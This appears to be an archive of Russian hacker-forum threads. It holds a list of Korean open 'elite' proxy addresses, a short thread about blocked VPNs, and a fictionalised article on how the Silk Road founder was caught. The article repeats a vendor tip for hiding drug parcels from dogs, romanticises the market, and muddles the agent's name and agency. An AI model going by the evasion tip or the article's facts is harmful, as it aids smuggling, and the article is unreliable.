58.140.239.169:8080 elite proxy Korea, Republic of (Seoul)
58.145.7.52:8080 elite proxy Korea, Republic of (Seoul)
58.231.158.215:50050 elite proxy Korea, Republic of (Seoul)
58.231.3.91:8080 elite proxy Korea, Republic of (Seoul)
58.233.74.107:8080 elite proxy Korea, Republic of (Seoul)
58.236.73.78:50050 elite proxy Korea, Republic of (Seoul)
58.237.253.160:8080 elite proxy Korea, Republic of (Seoul)
58.237.58.2:8080 elite proxy Korea, Republic of (Seoul)
58.73.134.152:8080 elite proxy Korea, Republic of (Seoul)
59.186.36.150:50050 elite proxy Korea, Republic of (Seoul)
59.186.6.35:50050 elite proxy Korea, Republic of (Seoul)
61.102.220.70:8080 elite proxy Korea, Republic of (Seoul)
61.104.109.114:8080 elite proxy Korea, Republic of (Seoul)
61.252.155.134:50050 elite proxy Korea, Republic of (Seoul)
61.254.30.47:8080 elite proxy Korea, Republic of (Seoul)
220.124.170.24:8080 elite proxy Korea, Republic of (Sindong)
203.81.136.101:8080 elite proxy Korea, Republic of (Songnam)
219.253.178.112:50050 elite proxy Korea, Republic of (Taegu)
220.122.142.196:8080 elite proxy Korea, Republic of (Taegu)
61.249.240.226:50050 elite proxy Korea, Republic of (Taegu)
220.81.201.143:8080 elite proxy Korea, Republic of (Taejon)
221.158.154.96:8080 elite proxy Korea, Republic of (Taejon)
210.127.227.69:8080 elite proxy Korea, Republic of (Ulsan)
163.180.196.115:8080 elite proxy Korea, Republic of (Yongin)
124.62.176.33:8080 elite proxy Korea, Republic of
125.176.236.124:8080 elite proxy Korea, Republic of
125.183.244.242:8080 elite proxy Korea, Republic of
125.188.51.108:8080 elite proxy Korea, Republic of
165.229.205.171:8080 elite proxy Korea, Republic of
165.229.205.91:8080 elite proxy Korea, Republic of
165.229.47.125:8080 elite proxy Korea, Republic of

Добавлено в [time]1149797862[/time]
Если кому интересно могу продолжить.

Wireguard, обсуждение

ID: 676533bbb4103b69df371915
Thread ID: 121213
Created: 2024-08-22T04:59:26+0000
Last Post: 2024-10-27T00:20:01+0000
Author: Zabuza
Replies: 61 Views: 6K

downdetector.su

[ WireGuard не работает сегодня? Сбой в работе WireGuard?

](https://downdetector.su/wireguard)

У Вас наблюдается сбой WireGuard? Мы поможем разобраться, почему не работает WireGuard, не открывается сайт, невозможной войти в личный кабинет, не загружается приложение! Узнайте о проблемах WireGuard первым!

downdetector.su

Задушили Wireguard и OpenVPN, какие способы подключиться на уровне системы (linux)?

Загадочная история Silk Road: процесс деанонимизации основателя крупнейшей торговой площадки теневой сети

ID: 676533bbb4103b69df371938
Thread ID: 34416
Created: 2020-01-17T08:16:45+0000
Last Post: 2024-09-01T13:58:31+0000
Author: ipaulsmith
Prefix: Статья
Replies: 6 Views: 6K

Blue and Orange Gaming YouTube Channel Art.png

Предисловие от автора

Добрый день, дорогие друзья! Хотелось бы предоставить вам историю, повествующую о деанонимизации крупнейшей торговой площадки теневого сегмента интернета, а именно, ее художественную вариацию и детально-разъясняющую статью о проходившем процессе, который оставил больше вопросов чем ответов. Художественная вариация затрагивает первые моменты, касающиейся поимки, и ежели Вам будет интересно, то я, непременно допишу эту историю полностью. Однако, пока написано только начало. Надеюсь, что тематика, подобранная мною, всецело соответствует пункту «Криминалистика. Цифровая криминалистика. Софт, приемы, методы». Более того, мои познания в сфере кибербезопасности не настолько масштабны, как у большей части форумчан, по сему, хочу заранее попросить прощения за излишнее упрощение терминологий и объяснения технической составляющей процесса. В первую очередь, мною оценивался сам метод, который, ко всеобщему удивлению, оказался не столько связан с технологиями, сколько с человеческим фактором.

Приятного чтения!

**Художественная интерпретация

Часть I. Первая операция на пути к успеху**

Spoiler

Кертис Грин проснулся рано утром. Он держал в руках два сахарных пончика, бутылку колы, когда кто-то позвонил один раз в дверь. Медленно перебирая ноги, он выдвинулся в сторону двери. В его сорок семь лет, Кертиса уже трудно было назвать здоровым человеком. Он страдал от избыточного веса, грыжи и пользовался зубными имплантами.

Подойдя к окну, он увидел, как куда-то вдаль бежит парень, на которого надет жилет почтовой службы UPS. Мысль о том, что все это чертовски странно поселилась в его голове. Паранойя усилилась, когда Кертис окинул длинную улицу взглядом и на противоположной стороне увидел ничем не примечательный микроавтобус белого цвета. На нем не было никаких надписей, а также задних окон.

Грин открыл входную дверь. На улице была зима, так что он быстро схватил посылку и понес ее в дом. На упаковке стоял штампик, который указывал, что перед ним находится посылка первого класса. Она не была большой, примерно с томик среднестатистического американского бестселлера. На ней не было указано обратного адреса, была наклеена лишь марка штата Мэрилэнд.

Недолго думая, Грин отнес посылку к себе на кухню. Достав швейцарский ножик, он аккуратно подковырнул пакет. Несмотря на всю осторожность, с которой он вскрывал упаковку, сделать это так, чтобы белый порошок не взмыл в воздух, у него не вышло. На руках Грина была сахарная пудра, в то время, как лицо было полностью покрыто ничем иным, как кокаином. На тот момент, его минутный ступор казался чем-то вроде вечности. Поскольку буквально через пару секунд в дом ворвалась группа SWAT, которая выбила тараном его дверь и весь дом наполнился отрядами полиции в бронежилетах, которые были вооружены до зубов. Грин все еще стоял в ступоре, покрытый белым порошком на лице и сахарной пудрой на руках. Пронзительный крик: “На пол! Руки за голову!” раздался как гром среди ясного неба и только в этот момент ему удалось полноценно прийти в себя и выйти из того ступора, в котором он провел буквально пару минут. Однако, на тот момент ему казалось, будто он стоит так уже несколько часов. К его виску был приставлен пистолет и кто-то очень отчетливо произнес те фразы, которые раньше Грин слышал только в американских блокбастерах, на которые очень любил ходить в кино по выходным: “Держи свои руки на виду!”.

Агенты SWAT и DEA заполнили всю квартиру. После того, как они скрутили Грина и оставили его лежать на полу, под присмотром двух офицеров агенты начали переворачивать весь дом вверх дном. В голове было чертовски много мыслей, которые сопровождались тем, что в квартире каждую секунду что-то падало, ломалось и разбивалось. Самое странное, что ему на тот момент было не столько страшно, сколько он переживал за дверь, которую агенты выбили тараном, даже несмотря на то, что она была открыта. Затем Грин снова перевел взгляд на злосчастный пакет и обнаружил, что на нем стоит пометка с красным драконом. Это означает, что это Перуанский товар высшего качества.

по правде говоря, Кертис не был обычным американским клерком и прекрасным семьянином, образ которого так четко вырисовывается в голове, когда слышишь про колу и сахарные пончики. Последние пару месяцев Грин обслуживал клиентов огромного интернет-магазина, что-то вроде eBay, но нелегального, имя которому “Silk Road”. Проект занимался продажей запрещенных товаров, которых никак нельзя найти в так называемом “клирнете” (светлой стороне сети, в которой мы сейчас и находимся). Однако весь ресурс и все сделки на данном ресурсе проводились именно в Даркнете. Той неизведанной части сети, которая не индексируется поисковиками а-ля “Google”, которыми мы с Вами привыкли пользоваться изо дня в день. Silk Road находился на той стороне интернета, которая с годами стала так мистифицирована, что про нее даже начали слагать легенды, такие как Тихий Дом, который положил начало целому поколению несталкеров. Там можно было достать абсолютно все. И Кертис Грин был тем человеком, который нашел свое призвание именно там. По большей части рынок был полон наркотических средств, в которых Кертис под ником “Хроническая боль”, разбирался лучше чем кто-либо еще. Годы употребления обезболивающих сделали свое дело и он четко и ясно понимал, что нужно конечному потребителю. Для того, чтобы попасть в эту часть сети, пользователю необходимо было воспользоваться специальным программным обеспечением, которое называется TOR. TOR работает по принципу луковой оболочки, то есть он практически полностью анимизирован. Благодаря появлению такого платежного средства как Биткоин, вкупе с анонимным криптографическим ПО, сайт позволял десяткам тысяч драг- диллеров находить друг друга и полноценно взаимодействовать. Для того, чтобы купить наркотики больше не было необходимости в том, чтобы встречаться на улице с дилером или договариваться о чем-то в условленном месте. Теперь достаточно было просто скачать анонимный браузер, пополнить биткоин кошелек, и каждый мог купить то, что ему было необходимо. Для этого не требовалось даже лично встречаться с человеком, у которого ты что-то покупаешь. На начальном этапе своего зарождения, так называемый Шелковый путь пользовался огромным спросом. В кои-то веки, люди не боялись покупать те вещества, которые им необходимы. За очень короткий промежуток времени, магазин сумел продать товара на целый миллиард долларов.

И вот, именно из-за всех этих факторов Кертис Грин сейчас лежал на полу, упираясь лицом в свой паркет. Он был нанят Ужасным пиратом Робертсом. Загадочной личностью, которая являлась главой “Шелкового пути”. Его имя часто сокращали как УПР. Он был создателем сайта и идейным вдохновителем всего сообщества. Более того, его личность, как и Сатоши Накамото, вызвала достаточно много вопросов. Многие считали, что это не один человек, а целая группа. Начиная от идей о том, что это проделки Русской мафии, заканчивая мыслям о самой масштабной операции АНБ, пользователи все равно пользовались тем, что наконец необходимые им товары теперь доступны, и могут уже завтра придти к вам с помощью службы доставки. Грамотно реализованный рынок Роса был настоящей проблемой для федеральных агентов, которые никак не могли отследить его местоположение. На протяжении целого года сотрудники ФБР, АНБ и почтовых служб пытались внедриться в руководство Шелкового пути. Захват Кертиса стал отправной точкой к прекращению деятельности этого колоссального проекта.

Федеральные агенты подняли Грина, параллельно задавая ему сотни вопросов. Их интересовало, почему в его сумке находится двадцать три тысячи долларов и с кем он общается посредством зашифрованных сообщений. Грин был скован. Сквозь застрявший ком в горле, он сумел выдавить из себя, что наличные, которые находятся в его сумке - это налоговой вычет. Медленно теряя нить между реальностью и вымыслом, он попросил офицеров достать ему из тумбочки обезболивающее. Однако полицейские просто вывели его из дома в наручниках, зачитав права, и предъявили ему обвинения в хранении килограмма кокаина с целью сбыта.

Находясь на допросе, Грин умолял полицейских не придавать огласке его имя. На тот момент он не знал, что было уже поздно. Он заявил, что УПР опасен и может просто его устранить. “У него миллионы долларов. Он просто избавится от меня, когда узнает, что меня взяли.” - с явной опаской в голосе произносил еще не потерявший надежду Грин.

Часть II. Росс Ульбрихт

Spoiler

Росс Ульбрихт был погружен в полноценный экстаз. Он наслаждался звуком своей джембы, африканского барабана и даже не заметил, как Джулия Ви, прекрасная девушка со светло-коричневой кожей и темно-карими глазами села подле него. Барабанный кружок был собран на обычной лужайке в штате Пенсильвания, где в 2008 году Росс получил степень магистра в области инженерии. Джулии было 18 лет, и как все люди, которые в этом возрасте подвержены анархизму, она испытала к нему дикую симпатию.

Они были поглощены этим необыкновенным чувством, которое в обиходе называют “любовь”. Расспрашивая людей, которые были тесно знакомы с ними, все в голос кричали о том, что их любовь была неподдельна. Это не было мимолетными помутнением, не было каким-то мгновением. Это была та любовь, при которой люди всю ночь зажимают свой рот руками, лишь бы в полноценной тишине наслаждаться сердцебиением друг-друга.

Однажды Росс, который тогда изучал кристаллы и работал над их выращиванием, сделал ей подарок. Он смог вывести огромный синий кристалл, который прикрепил к кольцу и подарил его Джулии. Она понятия не имела, как ему это удалось, но была уверена, что влюблена.

Родиной Ульбрихта был Остин, Штат Техас. Там его запомнили как чертовски умного и беззаботного паренька, который водил старый Вольво, курил марихуану и набрал почти предельный бал по SAT (американский экзамен на поступление в ВУЗ) экзамену.

Росс получил стипендию в Далласе, где выбрал физику в качестве своего основного предмета. Затем он получил стипендию в Пенсильванию, где снова преуспел. Но ему никогда не приносила удовольствия рутинная работа исследователя, которой он занимался. В колледже он увлекся восточной философией и начал открыто заявлять о том, что ему хочется сменить его профиль. Рассматривая заметки Росса, можно сделать вывод, что он был предельно разочарован в науке. Ему стала интересна экономическая составляющая. Скорее всего это случилось потому, что экономика является своего рода ключом к тому миру, в котором ему так хотелось жить. Он стал рассматривать налогообложение и правительство как аппарат насилия, которое поддерживается монополией государства во всех сферах. На его мышление сильно повлиял австрийский экономист Людвиг фон Мизес, прототип современной американской либертарианской ортодоксальности. Согласно фон Мизесу, гражданин должен иметь экономическую свободу, чтобы быть политически и морально свободным. И Росс хотел быть свободным.

После того, как Росс получил степень магистра, он вернулся в свой родной Остин. Говорили, что он отдал свои последние деньги, чтобы купить Джулии билет. Она бросила учебу, друзей и примчалась к нему. Они жили далеко не богато. Их лачужка не была хорошо обставленной студией с видом на Texas Capitol. Напротив, они жили очень бедно. Но несмотря ни на что, они были молоды, много мечтали и чёрт, да! Они любили.

Ему хотелось сделать так, чтобы она ни в чем себе не отказывала. И Росс пробовал себя во всем. Начиная от трейдинга, заканчивая собственной компанией по разработке видео-игр. Он пытался браться за все, что попадается ему под руку. Несмотря на многочисленные неудачи, Росс не сдавался.. Напротив, все те проекты, которые он пытался как-то реализовать, дали ему огромный толчок и помогли реализовать ту идею, о которой сейчас пишут люди со всех уголков земли.

В это время его сосед Донни Палмертри, который жил на пару этажей ниже, пригласил Росса работать с ним в Good Wagon Books, небольшой компании, которая занималась коллекционированием использованные книги и продавала их в таких магазинах, как Amazon и Books-A-Million. Росс создал сайт Good Wagon и написал собственный скрипт, который определял цену книги на основе рейтинга Amazon.

На складе Good Wagon Росс присматривал за пятью студентами колледжа, работающими неполный рабочий день. Они Занимались сортировкой, ведением журнала и упорядочиванием 50 000 книг на полках, которые Росс сам построил. Тот декабрь был лучшим месяцем за всю историю Good Wagon.

Пока он работал в этой компании, он все еще не упускал идею об изучении рынка. В свободное время он штудировал книги, всевозможные интернет-ресурсы,и пытался преуспеть в этом деле. Именно в тот момент Росс открыл биткойн — цифровую криптовалюту. Рыночная стоимость биткоина основана только на спросе. И к тому же данная криптовалюта была полностью децентрализована, что соответствовало его прогрессирующей либертарианской философии. На своей странице в LinkedIn Росс еще тогда написал, что он хотел «использовать экономическую теорию в качестве средства, которое бы положило конец конфликтам и прекратило бы попытки властей посягать на свободы людей».

Росс был слепо верен своим убеждениям, и посему считал, что прием наркотиков - это сугубо личное дело каждого. Наблюдая за попытками государства пресечь наркотрафик, он понимал, что все эти попытки терпят крах. Естественно, в тот момент он и решил для себя, что именно запрещенные вещества будут основой для его нового бизнеса.

Недолго думая, Росс пришел к своему боссу и сообщил, что его история в этой компании окончена. Он тогда описал свой проект как нечто невообразимое. Росс говорил о том, что его бизнес-идея на самом деле перспективна и может изменить жизнь многих людей.

Шелковый путь был запущен в середине января 2011 года. И вот уже спустя пару дней, была совершена первая продажа. Затем суммы и количество сделок начали доходить до колоссальных размеров. После того, как Росс продал весь свой товар, к нему подключились уже другие поставщики, которым стал интересен Silk Road. Он лично проводил все транзакции. Даже несмотря на то, что на это требовалось слишком много времени, он не руководствовался выгодой. Ему казалось, будто он делает что-то по-настоящему правильное. Самым важным фактором, который Росс выносил для себя, было чувство свободы. Ведь он считал, что главный фактор, сопутствующий прогрессу — свобода и демократия и. Свобода является продуктом исторического развития человечества. Действия законов не в состоянии избежать никто, однако они не являются высшей точкой развития общественности. Свобода не означает противопоставления социуму, она не является плодом анархии. По сути, пути к свободе являются иллюзорными. Реальная свобода достигается путем познания. Она заключается путем критики чистого разума. Нужно отдавать самим себе отчет в том, что абсолютная свобода невозможна не только из-за общественности и природных законов, а еще и потому, что желания и потребности индивида всегда разнятся от общественных. Природные и социальные рамки всегда будут ограничивать свободу, но Ульриху хотелось опровергнуть это умозаключение. Спустя совсем небольшое количество времени, пользователи и поставщики превратили проект в глобальный рынок.

Перед самым его запуском, Росс написал в своем дневнике: “Я сделаю этот год лучшим в своей жизни. У меня наконец появятся те возможности и власть в таком размере, в котором еще никогда не было. Этот год нужно провести так, чтоб хотя бы один человек рассказал мне о моем проекте, даже не догадываясь о том, что я его создатель.”

Часть III. Спецагент Форкс

Spoiler

Спецагент Карл Марк Форкс невольно заснул, когда местный почтовый инспектор начал рассказывать о проблемах с наркотиками на собрании . Большая часть полицейских никогда не принимала во внимание те моменты, которые обычно освещались на подобных поприщах. Это было что-то вроде долга службы: отсидеть заданное время и дальше уйти по своим делам.

“Посылки идут с сайта, который известен как Шелковый путь”, — громко заявил почтовый инспектор. Форка будто обдало холодной водой, ведь именно этого он так долго ждал. Форк являлся агентом УНБ из Балтимора. Жизнь спецагента была не так полна событий, как освещают нам сериалы. Напротив, порой она течет слишком монотонно. И осознав, что при своем росте в 182 см и 90 кг чистого веса, он уже вдоволь навоевался с уличными дилерами. Форк носил Мартинсы, любил вышибать двери с ноги и ловить драг-дилеров. Однако, тысячи подобных рейдов больше не приносили ему никакого душевного удовлетворения. Форк понимал, что ему уже пятьдесят и он живет на зарплату обычного рядового сотрудника. И это был не столько вопрос денег, сколько престижа. Ему было необходимо какое-то громкое дело, чтобы оставить коллег не у дел и с почетом выйти на пенсию. Посему он и начал посещать всевозможные собрания. Ему нужна была зацепка. Такая, которая подтолкнула бы его к самому важному делу в его жизни.

Форк услышал о проекте Шелковый путь примерно спустя год после того, как оный был запущен. К тому моменту проект уже был грамотно отделан. Отзывы, рейтинги, личные кабинеты все было сделано по принципу eBay. Пользователи заказывали товар через почтовые службы и указывали свой домашний адрес. Если возникали какие-то вопросы, то они просто отвечали, что не заказывали ничего подобного. Весь процесс был качественно отлажен и доведен до автоматизма.

В «Пособии продавца» Шелкового пути имелись полезные инструкции о том, как запечатывать в посылки в вакуум или иным образом прятать наркотики, чтобы избежать электронных датчиков или собак. То, что небольшой процент посылок был перехвачен, говорило не о том, что правоохранительные органы знают свое дело. Это больше говорило о том, что объемы продаж были чертовски высокими. Шелковый путь был раем для тех, кто разбирается в веществах: колумбийский кокаин, афганский героин, черный смолистый героин, называемый солодкой дьявола. В общем, все, что угодно потребителю...

Описание каждого продукта являлось своего рода энциклопедическим исследованием каждого представлена лота. Были моменты, когда пользователи оставляли комментарии в духе: “продукт клево светится”. Также в описании к МДМа пользователь решил поделиться своим опытом и сказал, что данный товар “приятно шипит и пускает дымок”.
Ключевая особенность проекта заключалась в том, что больше не было необходимости верить дилеру на слово о качестве товара. Теперь люди могли узнать мнение Джека из Оклахомы или Люка из Теннесси о различных товарах, даже не подозревая о том, кто они такие. Все это привело к тому, что качество товара стало чем-то вроде легенды.Именно такие отзывы и функционал стали улучшать репутацию сервиса, приводя туда все больше и больше пользователей.

Федеральные службы были в тупике. Для них данных проект был в новинку и они совсем не понимали, что же им с этим делать. Форк осознал весь масштаб и потенциал происходящего. Он понял что это именно то дело, которым он хочет заниматься. Тем не менее, он совсем не знал, с чего же ему начать.

По прошествии нескольких месяцев было принято решение о создании эффективной группы, которая бы противодействовала работе Шелкового пути. Начальник подошел к Форку, и задал ему вопрос: “- Карл, ты будешь участвовать?” Он улыбнулся, осознав, что это его шанс и спустя сорок минут спецагент уже был на встрече оперативников, где офицеры думали над тем, как же все-таки начать разрабатывать Шелковый путь. Вся ирония заключалась в том, что на этом собрании Форк уже не дремал. Он стремительно изучал механизм работы TCP/IP. Большинство участников данного собрания просто смотрели в мониторы. Они ничего не понимали в происходящем и даже не собирались разбираться. Но, Форс действительно хотел понять, что же все это такое, как оно работает и как было бы правильно решить эту задачу.

Операция по прекращению деятельности Шелкового пути получила название Марко Поло, а команда базировалась в Балитморе. Как только Форс зашел на сайт, он тут уже обратил внимание что на сайте есть четкий лидер, который работает под ником УПР. Форк, который ничего не понимал в компьютерах, сетях и биткоинах был слишком заинтригован происходящим. Он решил, что ему нужно во всем разобраться.

Часть IV. Операция “Чистка лука”; Anonymous в ФБР.

Spoiler

Хектор Ксавье Монсегур был огромным латиноамериканцем (пуэрто-американцем), который на первый взгляд казался довольно опасным человеком. В тот вечер, весной 2011 года, его ввели в камеру. Этот человек никогда не был известен под своей настоящей фамилией. В своих кругах его называли Сабу. Он был основателем LulzSec - группы черных экспертов по кибербезопасности, которые брали на себя ответственность за взломы таких гигантов, как News corp. И ЦРУ. Сабу был одним из самых известных членов группировки Anonymous. Человеком, который его арестовал был молодой сотрудник ФБР, Крис Тарбелл. Он был еще совсем молод и такая наживка считалась просто грандиозным успехом. Тарбелл сумел выйти на Сабу и завербовать его в качестве информатора.

По своему нутру Тарбелл всегда был полицейским. Родители хотели вырастить из него врача, однако его телосложение и склад ума неприкрыто кричали о том, что правоохранительные органы — это его призвание. Осознав свою тягу к этому ремеслу, он получил специальность в области вычислительной техники. Тарбелл совсем не разбирался в программировании, но он четко осознал, что за этим будущее, и всецело посвятил себя этому занятию. Впоследствии он стал внештатным компьютерно-техническим финансовым криминалистом ФБР.

На протяжении четырех лет Крис ездил по миру вместе с командой экспертов в области криминалистики, выискивая террористов, арестовывая людей, которые занимались распространением детской порнографии. После нескольких лет работы, Крис понял, что это его призвание. Ему всегда казалось, будто люди воспринимают интернет, как нечто запредельно далекое. Тарбеллу льстило, что он мог разгадать эту магическую загадку, которая неподвластна остальным людям.

Проведя годы в данном отделе, Тарбелл решил, что хочет вступить в ФБР. Он был направлен в Нью-Йорк, где находился отдел по борьбе с киберпреступностью, который только-только зарождался. На тот момент ему уже исполнился тридцать один год.

Большую славу Крису принесла поимка Сабу. ФБР выделили ему место в офисе, компьютер для работы, личную кружку и спустя год, благодаря его деятельности были проведены сотни арестов, которые нанесли значительный ущерб всему хакерскому сообществу.
После довольно монотонной работы, Тарбелл занялся поиском нового дела. Именно в этот момент он обнаружил для себя Шелковый путь, даркнет, Тор и биткоин. Он понимал, что шифрование Тора состоит из многих уровней и что взломать его является непосильной задачей. В тот момент, когда расследования доходили до Тор-бразуера, многие агенты сдавались. Однако Тарбелл был не таков. Он твердо решил, что возьмет и Тор.

Огромное количество правоохранителей пытались разгадать загадку Шелкового пути, однако их попытки так и не увенчались успехом. Нью-Йоркское УНБ запросила консультацию у Криса по техническому вопросу, но он все равно понимал, что здесь не существует никакой связи.

Часть V. Две личности Росса Ульбрихта

Spoiler

Росс всегда любил волны. Они были его неподдельной страстью, и поэтому в 2012 году он перебрался в Австралию. Его жизнь напоминала красивую историю из фильма, в котором утром он работал, а уже после обеда купался в океане. Благодаря тем деньгам, которые приносил ему проект Шелковый путь, Росс мог позволить себе жить на широкую ногу и ни в чем себе не отказывать. За полгода до этого, сайт просто взорвался от количества посетителей. Россу пришлось набирать людей, чтобы улучшить свой сервис: один он уже не справлялся. Всеми уязвимостями и дырами в безопасности он уже занимался сам. Однажды белый хакер указал ему на все его уязвимости, которые Росс допустил на своем проекте. Тот работал ночами, и был весьма изможден. Знакомым он казался все еще таким же жизнерадостным парнем, которым его знали. Однако внутри он был измотан. Администрирование самого крупного нарко-проекта ночью, и активная жизнь днем. В своем дневнике Ульбрихт описывал, что это были два самых стрессовых месяца в его жизнь.

Перед тем, как отправиться в Австралию, Росс пополнил свой банковский счет на сто тысяч долларов и каждый месяц зарабатывал по двадцать пять тысяч только на комиссиях.Тогда он решил, что ему требуется нанять людей, которые были бы готовы помогать ему с проектом.

Его очень волновал вопрос анонимности. Он всячески пытался отделить свое альтер-эго УПР от собственной личности. Первым шагом, который тот совершил на пути к анонимности, стала “продажа” Шелкового пути. Росс сказал своему однокурснику, Ричарду Бейтсу, который помогал ему во время технических сбоев о том, что тот продал проект неизвестному покупателю.

Самым важным моментом, который повлиял на его личность в этот промежуток времени, стала девушка, которую звали Джессика. Он пытался научиться врать, однако на первом же свидании сказал ей, что занимается обменом биткоинов. Он корил себя за это, так как понимал, что данная информация уже является утечкой. Росс разрывался между желанием открыться этой девушке и нежелании быть пойманным. Ему хотелось открыться ей, посему он просто сказал ей, что у него: “ есть секреты”.

Часть VI. Ужасный пират Робертс

Spoiler

Глава Шелкового пути оставался по прежнему загадочной личностью. Поставщики и покупатели понимали, что есть некий человек, который определил суть сайта сайта как такового. И многие воспринимали его не просто как площадку для продажи наркотиков. Фанатичные пользователи считали, что Росс является своего рода мессией и несет свободу в массы, пытаясь освободить людей от государственного гнета. Однако, данная анархическая идея потворствовала многим ассертивным личностям, которые отдавали предпочтение второй крайности своего психотипа: агрессии. Данные пользователи считали, что если идея Росса позволяет продавать наркотики, то можно продавать и оружие, и человеческие органы. Верный своим собственным взглядам, Ульбрихт установил гласные правила, которым все должны были подчиняться. Пусть Росс и не был на стороне закона, но его моральные принципы не позволяли ему заниматься теми черными делами, которыми и по сей день кипит темная часть сети. Он был ярым противником детской порнографии, порицал продажу дипломов. Росс принял определенное кредо: “Наши основные правила - это относиться к людям так, как ты хотел бы, чтобы относились к тебе. Никто не должен причинять никому вреда и обманывать.”

По прошествии времени, администратор стал не просто программистом, который писал код, задавал функционал и продавал наркотики. Совсем не так. Он стал предметом почитания. В Америке идея свобод обсуждается постоянно. Толерантность, равноправие, гендерное равенство. Росс превратил свою площадку в некий дом для тех личностей, которым хотелось, чтобы их права не были ущемлены тем “тоталитарным” государством, в котором они живут. Люди считали, будто то чему их учат со школьной скамьи абсолютно не верно. Ведь нас учат запоминать не человека, нас заставляют помнить его идею. Человек является слабым: его могут поймать, его могут посадить, а могут и вовсе предать забвению. Но идея способна изменить мир даже спустя сотни лет. Все мы знаем, ощущаем и понимаем, что такое сила идеи. Во имя нее совершали убийства, во имя нее погибали, за нее дрались, за нее держались. Но идею нельзя поцеловать. К ней не прикоснешься. Не обнимешь. Она не истекает кровью. Не чувствует боли. Идея никогда не сможет любить. Люди отдаются и совершают поступки во имя нее. Но разве идея выше человеческой жизни? Разве идея выше того, кто мог бы принести миру в несколько раз больше? Вы когда-нибудь задавались вопросом какой паразит является самым живучим? Вирус? Бактерия? Нет, чертовский неверно! Это идея. Она живучая и крайне заразная. Стоит идее завладеть мозгом, избавиться от нее практически невозможно. Я имею в виду сформировавшуюся идею, полностью осознанную, поселившуюся в голове и побуждающую на неосознанные и необдуманные поступки. И вот огромное количество людей, которые были заражены именно не личностью, а идеей, так громко потворствовали посту Ульбрихта на своей площадке, которая гласила: “Кто является Шелковым путем? Что является Шелковым путем?”. “Я и есть тот самый Шелковый путь. Та самая личность, та самая компания. Я являюсь олицетворением всего, что здесь есть. И я считаю, что мне нужно имя. Теперь я - Ужасный пират Робертс” ;

Да, может на других языках оно звучит не так вызывающе, но, американцы любят свой кинематограф. Особенно те фильмы, которые принято считать культовыми. Фильм “Принцесса-невеста” является классикой американского жанра и можно наблюдать явную отсылку к нему. В этом романтическом фильме, который был выпущен в прокат аж в 1987 году, Ужасный Пират Робертс (Dread Pirate Roberts) был мифической личностью, который жил уже очень давно и его маска передавалась другим пиратам, которых он выбирал сам. Создавалось впечатление, будто он является пиратом, который грабит, нападает и убивает, но в нем есть человечность. Росс пытался объяснить своим новым именем, что даже несмотря на то, что он администрирует этот нарко проект, он все равно остается человеком и ему не чужды такие эмоции как чувство долга и любовь.

Посвящение Ульриха в его новое альтер-эго спровоцировало новую идейную волну. Люди считали, что они проводят жизнь на краю гибели, ведя отчаянную борьбу с самими собой. Они не могут найти себя. Чувствуют себя чужими, отвергнутыми, пытаются убежать. Каждый человек чувствует, что он загнан в рамки. В рамки закона, морали или общественного строя. Но никто не отдает себе отчет в том, что границы человеческого сознания необъятны. Красоту и искусство можно найти во всем. И для того, чтобы обрести свободу, не нужно ходить на митинги или учинять анархию. Моральная и духовная свобода – это ключ к развитию и прогрессу. Для достижений сих благ нужно лишь заниматься собой и осознавать все свои плюсы и минусы, совершенствоваться самому, доносить это до окружающих и никогда не останавливаться. В мире не существует границ, которые человек не смог бы преодолеть. И только путем достижения этой нирваны можно познать “вкус свободы”.

Шелковый путь теперь стал действительно больше, чем просто наркорынок. Он использовался как аппарат противодействия власти. В кое-то веке никто не мог понять и отследить жизнь людей. Анонимность, право на частную личную жизнь - все это было наконец реализовано на площадке, которая всего-лишь занималась продажей наркотиков, но была пристанищем для тысяч людей, которым просто хотелось жить собственной жизнью, а не проживать ее за кого-то еще.

После того, как Росс осознал всю значимость своего проекта и почувствовал вкус власти, он заявлял, что каждая транзакция, совершенная на Шелковом пути - это маленький шаг к великому будущему и свободе.

Думаю, что никто и никогда не сможет узнать, являлось ли это утверждение маркетинговым ходом, или же он правда так считал. Но нельзя отнять тот факта, что Шелковый путь уже стал полноценным продолжением либертарианских взглядов. Это была альфа и омега, начало и конец, это был чертов Древний Рим, в котором УПР в качестве Гая Юлия покорял все возможные и невозможные рубежи. Он был не просто администратором, он был почитаем там как сам Цезарь, который пытался задать новую идею и новую систему государственно-цифровой экономики, где Шелковый путь ассоциировался бы только со свободой личности. Собственная цивилизация современности, децентрализованное государство, в котором люди могли думать. Они могли думать не переживая о том, что кого-то обидят или заденут. Они могли не подбирать слова и не боялись выражать свое “Я”.

Именно в тот момент, когда наступила эта утопия, провластные структуры и начали интересоваться проектом больше всего. Росс считал достижением то, что что Шелковый путь был упомянут на пресс-конференции сенатора Чарльза Шумера в в 2011 году. И после того, как Шелковый путь был подвержен колоссальной критике, Росс резюмировал на своей платформе: “Нашим врагом является правительство Соединенных Штатов Америки. Они знают о нас и хотят от нас избавиться. Однако все мы - Шелковый путь. И если взять одного, то остальные продолжат дело. Мы являемся гидрой, которой можно отрубить одну голову, но на ее месте сразу вырастут две. Мы и есть Шелковый путь”

Часть VII. Искренне ваш, Э.

Spoiler

Мистер Silk Road, ваша работа превосходна и я являюсь ее поклонником. Это просто феерия! Я не буду выписывать огромных текстов, просто перейду сразу к делу: я готов купить ваш проект. Я уверен, что ваш проект является будущим всего наркотрафика и готов заплатить за это любые деньги.

Искренне ваш, Э.

Форс работал над поиском основателя Шелкового пути и отправил данное сообщение с компьютера, который ему и выдали в офисе ФБР.

Карл Марк тщательно проработал свою новую личность. Ему пришлось полноценно погрузиться в работу, благодаря чему он смог создать абсолютно уникального человека: своего рода “консильери” одного Доминиканского наркокартеля, который зарабатывает на перевозках партий героина. Более того, его образ был настолько проработан, что у персонажа даже не было одного глаза. Форс надел на себя пиратскую повязку и попросил свою дочь его сфотографировать, чтобы поставить на аватарку. Он взял имя Эладио Гузман и придумал себе краткий никнейм: Ноб. Однако это не был просто набор символов. Форс посчитал, что будет весьма символично обозвать себя в честь библейского города, где Давид сумел заполучить меч Голиафа.

Для него не составило труда создать этот образ, потому что опыт работы под прикрытием никуда не исчез. Агенты ФБР должны изучать мастерство перевоплощения лучше, чем математику. И Карл как раз-таки был одним из тех, кто в молодости по долгу службы отращивал длинные волосы, носил серьги, и бил татуировки на спине.

Форс начал оценивать возможные объемы поставок, трафика, погрузился в изучении всей дистрибуции, ведь для Эладио Гузмана такой проект значил бы огромные деньги. Эладио был заинтересован в покупке, и любой человек, который ранее не сталкивался с агентами, никогда не почуял бы подвоха. Такая же участь постигла и Ужасного Пирата Робертса. Буквально на следующий день, он ответил: “Я открыт для предложений. Что вы хотите обсудить?”

